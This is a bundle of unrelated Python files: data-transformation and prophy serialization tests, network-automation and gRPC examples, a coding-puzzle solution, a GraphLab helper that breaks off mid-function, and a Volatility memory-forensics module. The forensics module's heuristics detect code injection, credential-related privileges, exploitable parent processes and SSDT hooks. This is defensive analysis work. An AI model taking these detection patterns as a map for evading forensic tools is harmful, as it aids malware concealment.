def test_zero_log(self):
run_log_methods("log", True, insert_nans=True, insert_zeros=True)
return
def test_zero_one_log(self):
run_log_methods("log", True, insert_nans=True, insert_zeros=True, insert_ones=True)
return
def test_zero_log10(self):
run_log_methods("log10", True, insert_nans=True, insert_zeros=True)
return
def test_zero_one_log10(self):
run_log_methods("log10", True, insert_nans=True, insert_zeros=True, insert_ones=True)
return
def test_zero_log2(self):
run_log_methods("log2", True, insert_nans=True, insert_zeros=True)
return
def test_zero_one_log2(self):
run_log_methods("log2", True, insert_nans=True, insert_zeros=True, insert_ones=True)
return
def test_multiple_transformations(self):
"""Test when we want to apply multiple transformations on one or more features"""
inputs = ['in1', 'inp1']
outputs = ['out1']
data = pd.DataFrame(np.random.random((100, 3)), columns=inputs+outputs)
x_transformation = "minmax"
y_transformation = ["log", "minmax"]
pred = build_and_run(x_transformation, y_transformation, data, inputs, outputs)
for i in pred.index:
assert np.allclose(data['out1'].loc[i], pred['out1'].loc[i])
return
def test_multiple_same_transformations(self):
"""Test when we want to apply multiple transformations on one or more features"""
inputs = ['in1', 'inp1']
outputs = ['out1']
data = pd.DataFrame(np.random.random((100, 3)), columns=inputs+outputs)
x_transformation = "robust"
y_transformation = ["robust", "robust"]
pred = build_and_run(x_transformation, y_transformation, data, inputs,outputs)
for i in pred.index:
assert np.allclose(data['out1'].loc[i], pred['out1'].loc[i])
return
def test_multiple_same_transformations_mutile_outputs(self):
"""Test when we want to apply multiple transformations on one or more features"""
inputs = ['in1', 'inp1']
outputs = ['out1', 'out2']
data = pd.DataFrame(np.random.random((100, 4)), columns=inputs+outputs)
x_transformation = "robust"
y_transformation = ["robust", "robust"]
pred = build_and_run(x_transformation, y_transformation, data, inputs,outputs)
for i in pred.index:
assert np.allclose(data['out1'].loc[i], pred['out1'].loc[i])
assert np.allclose(data['out2'].loc[i], pred['out2'].loc[i])
return
def test_example(self):
data = busan_beach()
inputs = ['pcp6_mm', 'pcp12_mm', 'wind_dir_deg', 'wind_speed_mps', 'air_p_hpa']
transformer = Transformation(method='minmax', features=['pcp6_mm', 'pcp12_mm'])
new_data = transformer.fit_transform(data[inputs])
orig_data = transformer.inverse_transform(data=new_data)
np.allclose(data[inputs].values, orig_data.values)
return
def test_negative(self):
for m in ["log", "log2", "log10", "minmax", "zscore", "robust", "quantile", "power",
"scale", "center", "sqrt", "yeo-johnson", "box-cox"]:
kwargs = {}
if m=="quantile":
kwargs['n_quantiles'] = 2
x = [1.0, 2.0, -3.0, 4.0]
tr = Transformation(method=m, treat_negatives=True, **kwargs)
xtr = tr.fit_transform(x)
_x = tr.inverse_transform(data=xtr)
np.testing.assert_array_almost_equal(x, _x.values.reshape(-1,))
for m in ["log", "log2", "log10", "minmax", "zscore", "robust", "quantile", "power",
"scale", "center", "sqrt", "yeo-johnson",
"box-cox"]:
kwargs = {}
if m=="quantile":
kwargs['n_quantiles'] = 2
x1 = [1.0, -2.0, 0.0, 4.0]
df1 = pd.DataFrame(np.column_stack([x, x1]))
tr = Transformation(method=m, treat_negatives=True, replace_zeros=True,
replace_zeros_with=1, **kwargs)
dft = tr.fit_transform(df1)
_df = tr.inverse_transform(data=dft)
np.testing.assert_array_almost_equal(df1.values, _df.values)
return
def test_boxcox(self):
t = Transformation("box-cox")
x1 = t.fit_transform([1,2,3])
from sklearn.preprocessing import PowerTransformer
x2 = PowerTransformer('box-cox').fit_transform(np.array([1,2,3]).reshape(-1,1))
np.testing.assert_array_almost_equal(x1, x2)
return
def test_yeojohnson(self):
t = Transformation("yeo-johnson")
x1 = t.fit_transform([1,2,3])
from sklearn.preprocessing import PowerTransformer
x2 = PowerTransformer().fit_transform(np.array([1,2,3]).reshape(-1,1))
np.testing.assert_array_almost_equal(x1, x2)
return
def test_center(self):
run_log_methods("center")
return
def test_scale(self):
run_log_methods('scale')
return
def test_from_config_1d(self):
for method in ["quantile", "robust",
"power", "box-cox", "center", "zscore", "scale"
]:
kwargs = {}
if method=="quantile":
kwargs['n_quantiles'] = 5
t = Transformation(method, treat_negatives=True, replace_zeros=True, **kwargs)
x = [1., 2., 3., 0.0, -5., 6.]
x1 = t.fit_transform(data=x)
conf = t.config()
t2 = Transformation.from_config(conf)
x2 = t2.inverse_transform(data=x1)
np.testing.assert_array_almost_equal(np.array(x), x2.values.reshape(-1,))
return
def test_from_config_2d(self):
for method in ["quantile", "robust",
"power", "box-cox", "center", "zscore", "scale"
]:
kwargs = {}
if method=="quantile":
kwargs['n_quantiles'] = 5
t = Transformation(method, features=['a', 'b'],
treat_negatives=True, replace_zeros=True, **kwargs)
x = np.random.randint(-2, 30, (10, 3))
data = pd.DataFrame(x, columns=['a', 'b', 'c'])
x1 = t.fit_transform(data=data.copy())
conf = t.config()
t2 = Transformation.from_config(conf)
x2 = t2.inverse_transform(data=x1)
np.testing.assert_array_almost_equal(x, x2.values)
return
if __name__ == "__main__":
unittest.main()
|
486625
|
import json
import logging
import os
import re
import pefile
from pefile import PEFormatError
from conf.config import EXPLOITABLE_PROCESS_NAMES
from conf.static_config import DLLS_IN_SYSDIR
from lib.common.pslist import get_new_pslist
from lib.common.utils import create_workdir
from lib.core.memory_utils import execute_volatility_command, dump_process, dump_dll
from lib.common.pe_utils import fix_pe_from_memory, static_analysis, get_strings
from lib.core.sample import SampleDump
# TODO: Heuristic for drivers of uncommon path or size
# ldrmodules anomalies
#
def run_heuristics(memory_instance, workdir=None, dump_objects=False):
"""
Execute all required heuristics
:param memory_instance: an instance of memory object
:param workdir: path to the workdir
:param dump_objects: wether to dump suspicious results or not
:return: dictionary containing all heuristics results
"""
pslist = get_new_pslist(memory_instance)
suspicious_drivers_by_ssdt = heuristic_ssdt(memory_instance, pslist=pslist, workdir=workdir,dump_objects=dump_objects)
suspicious_procs_by_dst_port = heuristic_dest_port_anomallies(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_loaded_dlls_by_count = heuristic_dll_uncommon_on_machine(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_processes_by_sids = heuristic_by_process_sids(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
injected_code = heuristic_injected_code(memory_instance, pslist=pslist, workdir=workdir, dump_objects=dump_objects)
suspect_processes = heuristic_exploitable_parent(memory_instance, workdir=workdir, dump_objects=dump_objects)
suspicious_dlls = heuristic_libraries_by_path(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_procs_by_privs = heuristics_process_privileges(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_handles = heuristic_suspicious_handles(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
result = {'pslist': pslist, 'injected_code': injected_code, 'suspicious_processes_by_handles': suspect_processes,
'suspicious_handles': suspicious_handles, 'suspicious_dlls': suspicious_dlls,
'suspect_processes_by_priv': suspicious_procs_by_privs,
'suspicious_procs_by_dst_port': suspicious_procs_by_dst_port,
'suspicious_loaded_dlls_by_count': suspicious_loaded_dlls_by_count,
'suspicious_processes_by_sids': suspicious_processes_by_sids,
'suspicious_drivers_by_ssdt': suspicious_drivers_by_ssdt}
return result
def heuristic_exploitable_parent(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Dump executable processes according to parent process name
:param memory_instance: an instance of memory object
:param pslist: list of processes obtained from get_new_pslist
:param workdir: path to the workdir
:param dump_objects: wether to dump suspicious results or not
:return:
"""
# Get process list
if pslist is None:
pslist = get_new_pslist(memory_instance)
suspect_processes = []
for process in pslist:
if process['Name'].lower() in EXPLOITABLE_PROCESS_NAMES:
logging.info('Checking child of exploitable process {}'.format(process['Name']))
for child_process in pslist:
if child_process['PPID'] == process['PID']:
if child_process['Name'] != process['Name']:
logging.info('Found potentially exploit payload: {}'.format(child_process))
suspect_processes.append(child_process)
if dump_objects:
logging.info('Dumping {} due to suspicious exploitable parent'.format(child_process))
dump_process(memory_instance, child_process['PID'], workdir,
process_name=child_process['Name'],
memdump=True)
return suspect_processes
def heuristic_by_process_sids(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Dump suspicious processes, according to running user
:param memory_instance: an instance of memory object
:param pslist: list of processes obtained from get_new_pslist
:param workdir: path to the workdir
:param dump_objects: wether to dump suspicious results or not
:return: dictionary of suspect code injection sections inside processes
"""
process_whitelist = ['System', 'msiexec.exe', 'VMwareService.e', 'spoolsv.exe', 'svchost.exe', 'vmacthlp.exe',
'services.exe', 'winlogon.exe', 'csrss.exe', 'smss.exe', 'lsass.exe','vmtoolsd.exe']
suspicious_processes = list()
# Get process list
if pslist is None:
pslist = get_new_pslist(memory_instance)
if workdir is None:
workdir = create_workdir()
# "columns": ["PID", "Process", "SID", "Name"]}
output = execute_volatility_command(memory_instance, 'getsids')
for priv in output:
if priv['SID'] == 'S-1-5-18' and priv['Process'] not in process_whitelist:
logging.info('Suspicious priv: {}'.format(priv))
suspicious_processes.append(priv)
if dump_objects:
logging.info('Dumping {} due to suspicious SID'.format(priv['PID']))
dump_process(memory_instance, priv['PID'], workdir,
process_name=priv['Process'],
memdump=True)
return suspicious_processes
def heuristic_injected_code(memory_instance, pslist=None, workdir=None, dump_objects=False, delete_non_pe=False):
"""
Dump injected code
:param memory_instance: an instance of memory object
:param pslist: list of processes obtained from get_new_pslist
:param workdir: path to the workdir
:param dump_objects: wether to dump suspicious results or not
:param delete_non_pe: delete non PE files or not, they could be shellcode injections
:return: dictionary of suspect code injection sections inside processes
"""
# Get process list
if pslist is None:
pslist = get_new_pslist(memory_instance)
if workdir is None:
workdir = create_workdir()
injected_dumps_list = list()
if dump_objects:
logging.info('Going to dump injected processes to {}'.format(workdir))
output = execute_volatility_command(memory_instance, 'malfind', extra_flags='-D {}/'.format(workdir),
has_json_output=False)
# Find malfind injections that are binaries, and rename them
for single_dump in os.scandir(workdir):
splitted_line = single_dump.path.strip().split('.')
if len(splitted_line) == 4:
offset = splitted_line[1]
imagebase = splitted_line[2]
try:
pe = pefile.PE(single_dump.path)
fixed_pe = fix_pe_from_memory(pe, imagebase=imagebase)
# Get original process name
procname = "unknown"
for process in pslist:
if str(process['Offset(V)']) == str(int(offset, 16)):
logging.info("Found process name: {}".format(process['Name']))
procname = process['Name']
pid = str(process['PID'])
break
outputpath = os.path.join(workdir, procname + '.' + offset + '.' + imagebase + '.fixed_bin')
logging.info('Dumping fixed PE to {}'.format(outputpath))
fixed_pe.write(filename=outputpath)
pe.close()
if procname != 'unknown':
injected_dumps_list.append({'path': outputpath, 'process_name': procname, 'pid': pid})
else:
injected_dumps_list.append(outputpath)
current_dump = SampleDump(outputpath)
with open(outputpath + '.strings.json', 'w') as strings_output_file:
strings_output_file.write(json.dumps(get_strings(current_dump), indent=4))
with open(outputpath + '.static_analysis.json', 'w') as strings_output_file:
strings_output_file.write(json.dumps(static_analysis(current_dump), indent=4))
except PEFormatError:
logging.info('Corrupted, or not PE file...')
if delete_non_pe:
os.remove(single_dump)
pass
result = {'PE_dump_list': injected_dumps_list}
else:
logging.info('Not output workdir defined, not going to dump injected processes.')
output = execute_volatility_command(memory_instance, 'malfind')
result = {'malfind_output': output}
return result
def heuristic_libraries_by_path(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Heuristics by path, using statistics and dlllist
:param memory_instance: memory instance object
:param pslist: list of loaded processes created by get_new_pslist()
:param workdir: path to working directory
:param dump_objects: wether to dump suspicious object or not
:return: dictionary of suspect processes
"""
loaded_dlls = execute_volatility_command(memory_instance, 'dlllist')
statistic_dict = dict()
suspicious_dlls = list()
max_files_threshold = 2
statistic_anomalies_list = ['\\systemroot\\system32\\smss.exe', 'c:\\windows\\explorer.exe',
'c:\\program files\\internet explorer\\ieproxy.dll']
for loaded_dll in loaded_dlls:
# loaded_dll['Path'].lower()
folder_path = '\\'.join(loaded_dll['Path'].lower().split('\\')[0:-1])
try:
statistic_dict[folder_path] += 1
except KeyError:
statistic_dict[folder_path] = 1
suspect_path_list = list()
sorted_dict = sorted(statistic_dict.items(), key=lambda x: x[1], reverse=True)
for path in sorted_dict:
if path[1] < max_files_threshold:
print(path)
suspect_path_list.append(path[0])
for loaded_dll in loaded_dlls:
for suspect_path in suspect_path_list:
if '\\'.join(loaded_dll['Path'].lower().split('\\')[0:-1]) == suspect_path.lower():
if loaded_dll['Path'].lower() not in statistic_anomalies_list:
suspicious_dlls.append(loaded_dll)
if dump_objects:
logging.info('Going to dump {} due to suspicious path'.format(loaded_dll))
dump_dll(memory_instance, loaded_dll['Pid'], loaded_dll['Base'], workdir)
return suspicious_dlls
def heuristic_suspicious_handles(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Heuristics by suspicious handles
:param memory_instance: memory instance object
:param pslist: list of loaded processes created by get_new_pslist()
:param workdir: path to working directory
:param dump_objects: wether to dump suspicious object or not
:return: dictionary of suspect processes
"""
handles_list = execute_volatility_command(memory_instance, 'handles', extra_flags='-s')
supported_handles = ['Key', 'File', 'Mutant', 'Thread']
# Initiate a dict with scoring per PID...
process_scoring = dict()
for process in pslist:
process_scoring[process['PID']] = {'Name': process['Name'], 'PID': process['PID'], 'PPID': process['PPID'],
'susp_keys': 0,
'susp_files': 0,
'susp_mutex': 0,
'susp_thread_handles': 0,
'Key': list(), 'File': list(), 'Mutant': list(),
'Thread': list()}
# for each process, add its handles to his dict
for handle in handles_list:
if handle['Type'] in supported_handles:
try:
process_scoring[handle['Pid']][handle['Type']].append(handle)
except KeyError:
logging.info('PID does not exists ({})'.format(handle['Pid']))
# Get a dictionary of running processes by name, for easier iteration (from pslist)
running_processes = dict()
for running_process in pslist:
running_processes[str(running_process['PID'])] = running_process['Name']
# Anomaly detection phase:
# Find processes with handles to threads in other processes...
for process_pid in process_scoring:
for thread_handle in process_scoring[process_pid]['Thread']:
# Get pid from regex:
m = re.search(r'^TID (\d{2,4})\sPID\s(\d{2,4})$', thread_handle['Details'])
if m:
tid = m.group(1)
pid = m.group(2)
if pid != str(process_pid) and pid != str(process_scoring[process_pid]['PPID']) and \
process_scoring[process_pid]['Name'] != 'csrss.exe':
try:
if process_scoring[process_pid]['Name'] == 'services.exe' and running_processes[
pid] == 'lsass.exe':
continue
if process_scoring[process_pid]['Name'] == 'lsass.exe' and running_processes[
pid] == 'svchost.exe':
continue
logging.info(
'This process has an handle to a thread in another process: {}-{} ---> {} ({})'.format(
process_scoring[process_pid]['Name'], process_pid, thread_handle['Details'],
running_processes[pid]))
except KeyError:
logging.info('This process has an handle to a thread in another process: {}-{} ---> {}'.format(
process_scoring[process_pid]['Name'], process_pid, thread_handle['Details']))
process_scoring[process_pid]['susp_thread_handles'] += 1
# Mutants (i.e statistically outstanding mutants)
# TODO: import fuzzywuzzy, from fuzzywuzzy import fuzz, fuzz.ratio(a,b)
# Files (i.e executables/DLLs from unusual paths)
# Keys (i.e persistency keys...)
# Create a final list of processes with more suspicious handles than the treshold:
threshold = 0
suspect_processes = list()
for process_pid in process_scoring:
if (process_scoring[process_pid]['susp_keys'] + process_scoring[process_pid]['susp_files'] +
process_scoring[process_pid]['susp_mutex'] + process_scoring[process_pid][
'susp_thread_handles']) > threshold:
suspect_processes.append({'pid': process_pid, 'name': process_scoring[process_pid]['Name'],
'susp_keys': process_scoring[process_pid]['susp_keys'],
'susp_files': process_scoring[process_pid]['susp_files'],
'susp_mutex': process_scoring[process_pid]['susp_mutex'],
'susp_thread_handles': process_scoring[process_pid]['susp_thread_handles']})
return suspect_processes
def heuristics_process_privileges(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Find suspicious processes according to process privileges
:param memory_instance: memory instance object
:param pslist: list of loaded processes created by get_new_pslist()
:param workdir: path to working directory
:param dump_objects: wether to dump suspicious object or not
:return: dictionary of suspect processes
"""
suspicious_privileges = ['SeDebugPrivilege', 'SeTcbPrivilege',
'SeTrustedCredManAccessPrivilege']
privs_list = execute_volatility_command(memory_instance, 'privs')
procs_with_suspicious_privs = list()
dumped_process_list = list()
for privilege in privs_list:
if privilege['Privilege'] in suspicious_privileges:
attributes_list = privilege['Attributes'].split(',')
if 'Present' in attributes_list and 'Enabled' in attributes_list and 'Default' not in attributes_list:
print(json.dumps(privilege))
procs_with_suspicious_privs.append(privilege)
if dump_objects and privilege['Pid'] not in dumped_process_list:
logging.info('Dumping {} due to suspicious privileges'.format(privilege['Pid']))
dump_process(memory_instance, privilege['Pid'], workdir, process_name=privilege['Process'])
dumped_process_list.append(privilege['Pid'])
return procs_with_suspicious_privs
def heuristic_dest_port_anomallies(memory_instance, pslist=None, workdir=None, dump_objects=False):
whitelisted_dest_ports = ['80', '443', '8443', '53', '3889']
suspicious_processes = list()
connections = execute_volatility_command(memory_instance, 'connections')
for conn in connections:
dst_ip, dst_port = conn['RemoteAddress'].split(':')
if dst_port not in whitelisted_dest_ports:
suspicious_processes.append(conn)
if dump_objects:
procname = 'unknown'
for process in pslist:
if str(process['Offset(V)']) == str(conn['Offset(V)']):
logging.info("Found process name: {}".format(process['Name']))
procname = process['Name']
pid = str(process['PID'])
break
dump_process(memory_instance, conn['PID'], workdir, process_name=procname)
return suspicious_processes
def heuristic_dest_ip_malicious_in_vt(memory_instance, pslist=None, workdir=None, dump_objects=False):
pass
def heuristic_dll_uncommon_on_machine(memory_instance, pslist=None, workdir=None, dump_objects=False):
loaded_dlls = execute_volatility_command(memory_instance, 'dlllist')
suspect_path_list = list()
loaded_dlls_counter = dict()
for loaded_dll in loaded_dlls:
try:
loaded_dlls_counter[loaded_dll['Path']]['counter'] += 1
except KeyError:
loaded_dlls_counter[loaded_dll['Path']] = {'counter': 0, 'first_seen': loaded_dll}
for key in loaded_dlls_counter:
if loaded_dlls_counter[key]['first_seen']['Path'] not in DLLS_IN_SYSDIR:
if loaded_dlls_counter[key]['counter'] == 1 and loaded_dlls_counter[key]['first_seen']['LoadCount'] == 1:
print('Going to dump: {}'.format(loaded_dlls_counter[key]['first_seen']))
if dump_objects:
dump_dll(memory_instance, loaded_dlls_counter[key]['first_seen']['Pid'],
loaded_dlls_counter[key]['first_seen']['Base'], workdir)
suspect_path_list.append(loaded_dlls_counter[key]['first_seen'])
return suspect_path_list
def heuristic_ssdt(memory_instance, pslist=None, workdir=None, dump_objects=False):
ssdt = execute_volatility_command(memory_instance, 'ssdt')
legitimate_owners = ['ntoskrnl.exe', 'win32k.sys']
known_owners = list()
for entry in ssdt:
if entry['Owner'] not in legitimate_owners and entry['Owner'] not in known_owners:
print('New ownwer: {}'.format(entry))
known_owners.append(entry['Owner'])
for driver_name in known_owners:
# /usr/local/bin/vol.py --profile WinXPSP2x86 -f "/home/MemoryDumps/APT.img" moddump -r irykmmww.sys -D /tmp
execute_volatility_command(memory_instance,'moddump',extra_flags='-r {} -D {}'.format(driver_name,workdir))
return known_owners
|
486629
|
import pytest
import prophy
@pytest.fixture(scope='session')
def X():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("x", prophy.u32)]
return X
@pytest.fixture(scope='session')
def FixedScalarArray():
class FixedScalarArray(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value", prophy.array(prophy.u32, size=2))]
return FixedScalarArray
@pytest.fixture(scope='session')
def FixedCompositeArray(X):
class FixedCompositeArray(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value", prophy.array(X, size=2))]
return FixedCompositeArray
def test_base_array_operators():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('values', prophy.array(prophy.i16, size=4))]
x = X()
x.values[0] = 123
x.values[2] = 4
x.values[3] = -1
with pytest.raises(TypeError, match="unhashable (:?object|type: '_array')"):
set([x.values])
assert len(x.values) == 4
assert repr(x.values) == '[123, 0, 4, -1]'
x.values.sort()
assert x.values == [-1, 0, 4, 123]
def test_fixed_scalar_array_assignment(FixedScalarArray):
x = FixedScalarArray()
assert x.value[:] == [0, 0]
x.value[0] = 1
x.value[1] = 2
assert x.value[:] == [1, 2]
x.value[:] = [6, 7]
assert x.value[:] == [6, 7]
x.value[slice(0, 2)] = [6, 7]
assert x.value[:] == [6, 7]
with pytest.raises(Exception, match="(:?__delitem__|'_array' object does not support item deletion)"):
del x.value[0]
with pytest.raises(Exception, match="'_array' object has no attribute 'no_such_attribute'"):
x.value.no_such_attribute
with pytest.raises(Exception, match="'_array' object has no attribute 'no_such_attribute'"):
x.value.no_such_attribute = 10
with pytest.raises(Exception, match="assignment to array field not allowed"):
x.value = 10
with pytest.raises(Exception, match=r"(:?object of type |)'int' has no (:?len\(\)|length)"):
x.value[:] = 10
with pytest.raises(Exception, match="setting slice with different length collection"):
x.value[:] = (10,)
with pytest.raises(Exception, match="not an int"):
x.value[0] = "will fail type check"
with pytest.raises(Exception, match=r"value: -1 out of 4B integer's bounds: \[0, 4294967295\]"):
x.value[0] = -1
y = FixedScalarArray()
y.value[:] = [1, 2]
y.copy_from(x)
assert y.value[:] == [6, 7]
def test_fixed_scalar_array_operators(FixedScalarArray):
x = FixedScalarArray()
y = FixedScalarArray()
assert x.value == x.value
x.value[0] = 23
assert x.value != y.value
y.value[0] = 23
assert x.value == y.value
def test_fixed_scalar_array_print(FixedScalarArray):
x = FixedScalarArray()
x.value[:] = [1, 2]
assert str(x) == ("value: 1\n"
"value: 2\n")
def test_fixed_scalar_array_encode(FixedScalarArray):
x = FixedScalarArray()
x.value[:] = [1, 2]
assert x.encode(">") == b"\x00\x00\x00\x01\x00\x00\x00\x02"
def test_fixed_scalar_array_decode(FixedScalarArray):
x = FixedScalarArray()
x.decode(b"\x00\x00\x00\x01\x00\x00\x00\x02", ">")
assert x.value[:] == [1, 2]
def test_fixed_scalar_array_exception():
class D(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a_len", prophy.u8),
("a", prophy.array(prophy.u8, bound="a_len"))]
class U(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a", prophy.array(prophy.u8))]
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(D, size=2)
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(U, size=2)
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(D, bound="a_len", size=2)
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(U, bound="a_len", size=2)
def test_fixed_composite_array_assignment(FixedCompositeArray):
x = FixedCompositeArray()
assert len(x.value) == 2
assert x.value[0].x == 0
assert x.value[1].x == 0
x.value[0].x = 1
assert x.value[0].x == 1
x.value[1].x = 2
assert x.value[1].x == 2
y = FixedCompositeArray()
y.value[0].x = 10
y.value[1].x = 11
y.copy_from(x)
assert y.value[0].x == 1
assert y.value[1].x == 2
assert x.value == x.value
def test_fixed_composite_array_print(FixedCompositeArray):
x = FixedCompositeArray()
x.value[0].x = 1
x.value[1].x = 2
assert str(x) == ("value {\n"
" x: 1\n"
"}\n"
"value {\n"
" x: 2\n"
"}\n")
def test_fixed_composite_array_encode(FixedCompositeArray):
x = FixedCompositeArray()
x.value[0].x = 1
x.value[1].x = 2
assert x.encode(">") == b"\x00\x00\x00\x01\x00\x00\x00\x02"
def test_fixed_composite_array_decode(FixedCompositeArray):
x = FixedCompositeArray()
x.decode(b"\x00\x00\x00\x01\x00\x00\x00\x02", ">")
assert x.value[0].x == 1
assert x.value[1].x == 2
def test_fixed_array_with_enum():
class E(prophy.with_metaclass(prophy.enum_generator, prophy.enum)):
_enumerators = [("E_1", 1),
("E_2", 2),
("E_3", 3)]
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.array(E, size=3))]
x = A()
x.encode(">")
def test_fixed_array_decode_exception():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a_len", prophy.u8),
("a", prophy.array(prophy.u8, bound="a_len", size=3))]
with pytest.raises(Exception, match="A: too few bytes to decode array"):
A().decode(b"\x00", ">")
def test_fixed_array_decode_size_over_255():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", prophy.array(prophy.u8, size=300))]
x = X()
x.decode(b'\x01' * 300, '<')
assert len(x.x) == 300
def test_fixed_array_decode_multiple_scalar_arrays():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('x', prophy.array(prophy.u8, size=1)),
('y', prophy.array(prophy.u8, size=1)),
('z', prophy.array(prophy.u8, size=1))]
x = X()
x.decode(b'\x00\x00\x00', '<')
def test_fixed_array_decode_multiple_composite_arrays():
class Y(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('x', prophy.u8)]
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('x', prophy.array(Y, size=1)),
('y', prophy.array(Y, size=1)),
('z', prophy.array(Y, size=1))]
x = X()
x.decode(b'\x00\x00\x00', '<')
|
486634
|
import phantom.rules as phantom
import json
#
# Meraki sample playbook
#
# Copyright (c) 2016 World Wide Technology, Inc.
# All rights reserved.
#
# author: <NAME>, World Wide Technology
#
#
def locate_device_cb(action, success, container, results, handle):
if not success:
return
paths = ['action_result.data.*.client.mac',
'action_result.data.*.client.description',
'action_result.data.*.device',
'action_result.data.*.network',
'action_result.data.*.organization']
data = phantom.collect(results, paths)
phantom.debug(data)
return
def on_start(container):
parameters = []
parameters.append({
"search_string": "d8:30:62:8f:33:b7",
"timespan": "600",
})
phantom.act("locate device", parameters=parameters, assets=["meraki dashboard"], callback=locate_device_cb)
return
def on_finish(container, summary):
# This function is called after all actions are completed.
# Summary and/or action results can be collected here.
summary_json = phantom.get_summary()
summary_results = summary_json['result']
for result in summary_results:
action_run_id = result['id']
action_results = phantom.get_action_results(action_run_id=action_run_id)
return
|
486639
|
import argparse
import multiprocessing
from purerpc.server import Server
from generated.greeter_pb2 import HelloReply
from generated.greeter_grpc import GreeterServicer
"""
def configure_logs(log_file=None):
conf = {
"version": 1,
"formatters": {
"simple": {
"format": "[%(asctime)s - %(name)s - %(levelname)s]: %(message)s"
},
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "WARNING",
"formatter": "simple",
"stream": "ext://sys.stdout",
}
},
"root": {
"level": "WARNING",
"handlers": ["console"],
},
"disable_existing_loggers": False
}
if log_file is not None:
conf["handlers"]["file"] = {
"class": "logging.FileHandler",
"level": "DEBUG",
"formatter": "simple",
"filename": log_file,
}
conf["root"]["handlers"].append("file")
logging.config.dictConfig(conf)
configure_logs()
"""
class Greeter(GreeterServicer):
async def SayHello(self, message):
return HelloReply(message="Hello, " + message.name)
async def SayHelloToMany(self, input_messages):
async for _ in input_messages:
pass
yield HelloReply(message="Hello, world!")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--num_processes", default=0, type=int)
args = parser.parse_args()
if args.num_processes == 0:
num_processes = multiprocessing.cpu_count()
else:
num_processes = args.num_processes
server = Server(50055, num_processes=num_processes)
server.add_service(Greeter().service)
server.serve()
|
486643
|
import click
from nornir import InitNornir
from nornir.core.filter import F
from nornir_utils.plugins.functions import print_result
from nornir_scrapli.tasks import send_configs as scrapli_send_configs
# from nornir_napalm.plugins.tasks import napalm_configure
# from nornir_netmiko.tasks import netmiko_send_config
import ipaddress
from constants import config_file
import os
def get_env_vars(ctx, args, incomplete):
return [k for k in os.environ.keys() if incomplete in k]
def interfaces_config(task):
interfaces_cms = []
interfaces = task.host["interfaces"]
for name, interface in interfaces.items():
cm = f"interface {name}"
interfaces_cms.append(cm)
if "lo" not in name.lower():
interfaces_cms.append("no shut")
interface = ipaddress.IPv4Interface(interface)
cm = f"ip address {interface.ip} {interface.network.netmask}"
interfaces_cms.append(cm)
if task.host.platform == "cisco_xr":
interfaces_cms.append("commit")
# task.run(netmiko_send_config, config_commands=interfaces_cms)
task.run(scrapli_send_configs, configs=interfaces_cms)
# task.run(napalm_configure, configuration=interfaces_cms, replace=False)
@click.group(name="interfaces")
def cli_interfaces():
"""Command for interfaces configuration"""
pass
@cli_interfaces.command(
name="configure",
help="Configure the Interfaces from the dictionary defined in hosts.yaml",
)
# @click.argument("device2", type=click.STRING, autocompletion=get_env_vars)
@click.option(
"--device",
help="Configure only the device",
required=False,
autocompletion=get_env_vars,
)
@click.option(
"--group", help="Configure all devices belong to the group", required=False
)
def run_interfaces_config(device, group):
# config_file = os.environ.get('NORNIR_CONFIG_FILE')
# os.chdir('../')
# os.getcwd()
# breakpoint()
nr = InitNornir(config_file=f"{config_file}")
if device:
nr = nr.filter(name=f"{device}")
if group:
nr = nr.filter(F(groups__contains=f"{group}"))
result = nr.run(task=interfaces_config)
print_result(result)
|
486675
|
class Solution(object):
def uniquePathsWithObstacles(self, grid):
"""
:type obstacleGrid: List[List[int]]
:rtype: int
"""
if not grid:
return 0
if grid[0][0] == 1:
return 0
dp = [[0] * len(grid[0]) for _ in range(0, len(grid))]
dp[0][0] = 1 if grid[0][0] == 0 else 0
for i in range(1, len(grid)):
if grid[i][0] == 0:
dp[i][0] = 1
else:
break
for j in range(1, len(grid[0])):
if grid[0][j] == 0:
dp[0][j] = 1
else:
break
for i in range(1, len(grid)):
for j in range(1, len(grid[0])):
if grid[i][j] == 1:
dp[i][j] = 0
else:
dp[i][j] = dp[i - 1][j] + dp[i][j - 1]
return dp[-1][-1]
|
486679
|
import graphlab as gl
def extract_entities(sf, entities):
'''
Extract entities (nodes or edges) from graph data retrieved from a
JSON file created by Neo4j.
Args:
sf: The sf containing 'data' column extracted from a JSON file
created by Neo4j.
entities: The entities to extract from sf. Can be 'nodes' or
'relationships'.
Returns:
SFrame of given entities
'''
sf[entities] = sf['data'].apply(lambda data: data['graph'][entities])
entities_sf = sf[[entities]].stack(entities, new_column_name=entities)
